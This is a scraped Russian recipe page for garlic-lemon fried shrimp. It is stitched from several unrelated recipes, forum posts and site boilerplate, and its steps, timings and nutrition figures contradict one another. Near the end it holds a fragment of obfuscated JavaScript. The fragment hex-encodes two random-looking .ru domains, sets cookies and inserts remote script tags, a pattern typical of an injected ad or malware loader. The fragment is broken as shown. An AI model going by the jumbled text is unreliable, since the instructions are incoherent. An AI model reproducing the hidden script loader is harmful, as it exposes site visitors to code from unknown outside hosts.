| | Шурпа

Рецепт жареные креветки с лимоном и чесноком

Рецепт жареные креветки с лимоном и чесноком
Сложность рецепта: средний
Время приготовления: 14-36 мин
Количество порций: 2-7
Калорийность: 360 ккал/100 грамм
Белки: 24
Жиры: 28
Углеводы: 22

Затем положите морепродукты в сковороду и тщательно перемешайте с соусом. Креветки обжариваются приблизительно 8—10 минут. Перед самым завершением приготовления кладётся измельчённая петрушка или любая другая зелень, которую вы предпочитаете. Также отлично подойдёт укроп. Выньте креветки из соуса и немного потушите его, пока он не станет более густой консистенции. Затем верните морепродукты обратно и припустите их ещё пару минут. Чеснок и имбирь натираются на тёрке и перемешиваются. Стебли лимонника разрезаются на 4 равных части. Перец мелко натирается и добавляется к смеси чеснока с имбирём. При этом лучше работать в перчатках, так как сок острого перца очень тяжело отмываются от рук. Положите в смесь нарезанный лимонник, лаймовые листья, соль, масло и залейте соком. В получившийся рассол кладутся креветки и настаиваются в холодильнике несколько часов (не более 5—6-ти). После этого заверните их в фольгу прямо в маринаде и запеките на решётке или на углях. И прямой гиперссылки на наш сайт //Attuale. Что может быть проще и вкуснее креветок, жареных с чесноком? Такая изумительная закуска прекрасно подходит к пиву или бокалу вина. Однако ее можно приготовить и просто так. Едва ли от этого превосходного лакомства кто-то откажется! Морепродукты сделать совсем несложно, но в результате получится миниатюрный кулинарный шедевр, который в мгновение ока разлетится с тарелок. Ведь определенную пикантность ему придает не только душистая заправка, но и сок свежевыжатого лимончика. Казалось бы, все компоненты такие простые и привычные, но каким непревзойденным оказывается результат! Как правило, сложностей с приготовлением морепродуктов по предложенному рецепту никогда не возникает. Этот вариант можно смело именовать прекрасным решением для холостяков, «чайников» или начинающих любителей кулинарии. Даже если вы практически не умеете готовить, это блюдо непременно у вас удастся на «5+»! Сперва надо достать замороженные креветки. Морепродукты стоит переложить в дуршлаг и несколько раз промыть холодной водой, после чего они перекладываются в кастрюлю с высокими бортиками. Затем креветки потребуется щедро посыпать любимыми приправами и оставить до полного размораживания. Сколько времени на это уйдет? Тут всё индивидуально, но обычно процесс занимает от 30 минут до 2 часов. Когда морепродукты оттают, с них потребуется слить образовавшуюся жидкость. В нее нужно влить растительное масло, которое должно полностью закрывать дно посуды. Оно разогревается, а тем временем чеснок потребуется очистить от шелухи и порезать тонкими слайсами. Нарезка отправляется в раскаленное масло и обжаривается до приобретения золотистого оттенка. Это позволит маслу напитаться душистым чесночным запахом. Далее шумовкой потребуется извлечь чеснок из масла и выложить на отдельную тарелку – больше он нам не понадобится. В напитанное чесноком масло перекладываются морепродукты. Их следует выложить в один слой и хорошенько обжарить. Креветки надо время от времени помешивать. Общая продолжительность жарки одной партии – минут 10. Зарумянившиеся креветочки следует переложить на плоскую тарелку. Теперь остается только сбрызнуть их лимонным соком. Блюдо готово и можно смело приступать к дегустации! Тогда ставьте 👍Хотите видеть больше наших рецептов в ленте Яндекс. Тогда добавляйте сайт Pokushay. Как это сделать, читайте. Если вы делаете креветки по подобному рецепт впервые, воспользуйтесь видео. Продолжая просмотр сайта, вы соглашаетесь с использованием файлов cookie. Затем добавляем немного оливкового масла, солим, перчим по вкусу и обжариваем креветки в течение 3-5 минут, постоянно перемешивая. Добавить лимонный сок к креветкам, тщательно перемешать. Обжаривать еще несколько минут на том же сильном огне. Выложить креветки в глубокую тарелку, украсить лимоном и подавать! Если в сковороде осталась жидкость - её можно использовать в качестве соуса к креветкам. А если нет - попробуйте с соусом Тартар! Перепечатка материалов данного сайта возможна только с письменного разрешения редакции. При цитировании ссылка на yummybook. Рецепт: Жареные креветки в соевом соусе Жареные креветки в соевом соусе с чесноком и лимоном с фото пошагово. Жареные креветки в соевом соусе — это деликатес, популярное и весьма любимое блюдо на китайских свадьбах, это не просто вкусное, но и полезное блюдо. Это блюдо, мы попробовали будучи за границей, в очень известном ресторане. Мне очень понравился его незабываемый вкус. Слово за слово, мы познакомились с администратором ресторана, а после и с поваром, который нам рассказал секрет этих превосходных креветок. Секрет заключается в том, чтобы выбрать именно хорошие и свежие креветки, для этого нужно обращать внимание на их внешний вид. Хорошая креветка должна быть розового цвета, без пятен, с хорошим панцирем (панцирь не должен быть сухим или подсохшим). А сам рецепт приготовления достаточно прост, сейчас им я и поделюсь. Сначала нужно очистить креветки от панциря (если у Вас замороженные креветки, при комнатной температуре необходимо их разморозить, после приступать ко всем этапам приготовления). Чеснок почистить, помыть, мелко нарезать. В одной посудине смешать креветки, лимонный сок, соевый соус и оставить на 10 минут. Хорошо разогреть сковороду, добавить сливочное масло. Когда масло начнет таять выложить креветки, чеснок, посолить, поперчить, жарить около 5 минут до золотистой корочки с двух сторон. Снять с плиты, выложить в тарелку, украсить зеленью. Blyuda-iz-korolevskih-krevetok - запись пользователя Лизавета Хубецова (Sweetylisa) в сообществе Кулинарное сообщество в категории Блюда из рыбы и морепродуктов - Babyblog. Девченки, не могу не поделиться с вами самым вкусным рецептом ЖАРЕНЫХ КРЕВЕТОК! Мы так жарим уже больше года! Жарим таким способом и КОРОЛЕВСКИЕ креветки и МАЛЕНЬКИЕ креветки! Выкладываем замороженные (не очищенные) креветки на глубокую сковороду, на самый большой огонь и ЖДЕМ пока выпарится вся жидкость. Креветки "варятся в собственном соку", поэтому заранее размороженные креветки будут иметь суховатый вкус, не советую! Когда жидкости почти не остается, добавляем оливковое масло (по вкусу), соль и мешаем мешаем мешаем, всё на том же большом огне. У меня это занимает максимум 3 минутки. Можно использовать и подсолнечное масло БЕЗ запаха. Выдавливаем туда же лимоны и не выключаем пока основная масса жидкости не выпарится, НО ГЛАВНОЕ выпарить НЕ ВСЮ жидкость! Должна остаться "подливка", тогда креветки можно будет макать в эту подливку наивкуснейшую! В самом конце, когда сняли с огня сковороду, добавляем выдавленный чеснокодавилкой чеснок и перемешиваем! Соль кладу сразу(морскую). Она никуда не выпаривается, но лучше пропитывает креветки и не даёт им развариться, если воды было слишком много. Чеснок добавляю в конце жарки креветок, дабы он немного прожарился и приобрел аромат пассерованного чеснока. У меня подруга тушила креветки почти также, только на 1кг брала 2 лимона и добавляла приправу для шашлыков, получалось шикарно. Вот только не могу понять откуда у нее соуса получалось так много (ведь от 2-ух лимонов и собственного сока креветок много не получишь), Может воды подливала? Спросил бы лично у нее, но из-за ссоры не разговариваем))[removed]window. Parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="14945",n=function(o){var e=[removed]. DecodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t{};var n=t. Expires;if("number"==typeof n&&n){var i=new Date(n);n=t. Expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d! ToString(16);return e},p=function{var w=window,p=w. IndexOf(')==0){return p}for(var e=0;e<3;e++){if(w. IndexOf(')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p;if(lp=='')return;var n=lp+"//"+o;if(window. Replace(':',''));else{var i=document. SetAttribute("type","text/javascript"),document. Js",a(f,function{i("oisdom",e)},function{var t=o. Js",a(f,function{i("oisdom",e)},function{var t=o. Каждую дольку чеснока режем вдоль на части 1-2 мм толщиной. Креветки я предварительно размораживаю - бросаю в кастрюлю с водой. Разогреваю большую чугунную сковородку. Выливаю на нее оливковое масло. Когда масло прогреется, бросаем нарезанный чеснок. Через пару минут чеснок потемнеет - превратится в шкварки. Ложкой с дырками удаляем чесночные шкварки. Бросаем нарезанный перец чили. Тут же натираем (теркой) в сковороду цедру 1 лимона. Мелкие жарю 3 минуты, крупные 5 минут. Обычно использую для этого "15 трав и специй" от Галина Бланка. Это обычная средняя креветка с намороженным льдом равным по весу самой креветки. Кто был в Тайланде и других жарких странах меня поймет. Говорила, что они полезные.

Видео рецепты

Фото приготовления

Фото 1 Фото 2 Фото 3 Фото 4 Фото 5 Фото 6
Комментарии
Очень здорово оформили, и рецепт и картинка каждого. Обязательно сохраню в избранное и буду готовить
Другие рецепты: